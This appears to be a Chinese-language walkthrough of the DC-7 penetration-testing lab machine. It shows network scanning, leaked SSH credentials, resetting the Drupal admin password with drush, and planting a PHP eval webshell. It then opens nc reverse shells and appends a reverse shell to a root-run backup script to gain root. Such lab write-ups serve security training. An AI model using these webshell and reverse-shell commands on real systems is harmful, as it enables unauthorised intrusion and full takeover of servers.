1. 信息查詢

1.1.?查看ip

arp-scan ?-l

192.168.220.136

1.2. 端口

nmap -T4 ?-A ?-p- ?192.168.220.136

訪問端口號(hào)

2. 滲透階段

2.1. 通過DCUSER 獲取賬號(hào)密碼

然后在當(dāng)前的頁面中可以發(fā)現(xiàn)@DCUSER，不知道是什么，扔到谷歌進(jìn)行查詢，發(fā)現(xiàn)原來是 github 上的一位博主名字

發(fā)現(xiàn)了有源碼信息的泄露

dc7user

MdR3xOgB7#dW

2.2. 遠(yuǎn)程連接獲取 backups.sh

遠(yuǎn)程連接當(dāng)前用戶

ssh ?dc7user@192.168.220.136

通過查看 home 目錄下的文件，發(fā)現(xiàn)了 mbox，查看文件內(nèi)容以后，發(fā)現(xiàn)是一封郵件，在郵件中可以看到如果想要提權(quán)可以使用 backups.sh

ls -lcat mbox

查看文件內(nèi)容

cat ?/opt/scripts/backups.shls -l /opt/scripts/backups.sh

2.3. drush 介紹

發(fā)現(xiàn)當(dāng)前想要提權(quán)需要為 www-data 用戶組才可以，在腳本中發(fā)現(xiàn)了 drush，百度查一下發(fā)現(xiàn)原來是個(gè)大寶貝

Drush 是一個(gè)很棒的 shell 界面，用于直接從您的云服務(wù)器命令行管理 Drupal。這是一個(gè)非常有用的工具，因?yàn)樗梢詭椭诮K端中僅使用一兩個(gè)命令來執(zhí)行各種管理任務(wù)，而無需在 UI 中進(jìn)行多次點(diǎn)擊和頁面刷新。

您是否在您的站點(diǎn)上處理許多用戶帳戶？ Drush 可以幫助輕松管理它。

您可以使用以下命令創(chuàng)建新用戶：

drush user-create username --mail="email@example.com" --password="password"

然后終端將顯示有關(guān)新創(chuàng)建的用戶的一些信息。想刪除這個(gè)用戶？使用以下命令：

drush user-cancel username

就這么簡單。想更改密碼？或與此相關(guān)的任何其他用戶密碼？運(yùn)行以下命令：

drush user-password admin --password="new_pass"

那現(xiàn)在我們就可以直接使用這個(gè)工具來修改 admin 的密碼

drush user-password admin --password="admin"

注意:需要在/var/www/html 目錄下進(jìn)行密碼的修改

2.4. 一句話木馬

接下來進(jìn)行登錄

編輯頁面可以發(fā)現(xiàn)當(dāng)前有一個(gè)可輸入的富文本框，可以嘗試去寫入一句話木馬，但是又發(fā)現(xiàn)當(dāng)前的富文本不支持 php 環(huán)境，此時(shí)需要查看平臺(tái)是否能安裝 php 環(huán)境

這樣php環(huán)境就安裝好了

在勾選一下選項(xiàng)

Ok了

傳入一句話木馬

<?php @eval($_POST[123])?>

這里注意要先選擇php再編寫一句話木馬

直接進(jìn)入首頁發(fā)現(xiàn) 一句話木馬已經(jīng)執(zhí)行，接下來就可以使用蟻劍進(jìn)行連接

2.5. 蟻劍連接反彈shell(進(jìn)入 www-data 用戶)

進(jìn)入蟻劍的命令行終端

kali中nc -lvvp 4444python -c 'import pty;pty.spawn("/bin/bash")'蟻劍nc -e /bin/bash 192.168.126.138 4444

192.168.220.146

2.6. 反彈 shell 獲取 root 權(quán)限

因?yàn)楫?dāng)前已經(jīng)是 www-data 的用戶了，接下來就可以去執(zhí)行/opt/scripts/backups.sh 這個(gè)腳本，執(zhí)行這個(gè)腳本最終我們想要讓他通過反彈提權(quán)到 root，所以需要將反彈的代碼追加到腳本中

echo ?"nc -e /bin/bash 192.168.220.146?7777" ?>> /opt/scripts/backups.shcat ?/opt/scripts/backups.sh

接下來在 kali 中設(shè)置監(jiān)聽

nc ?-lvp 7777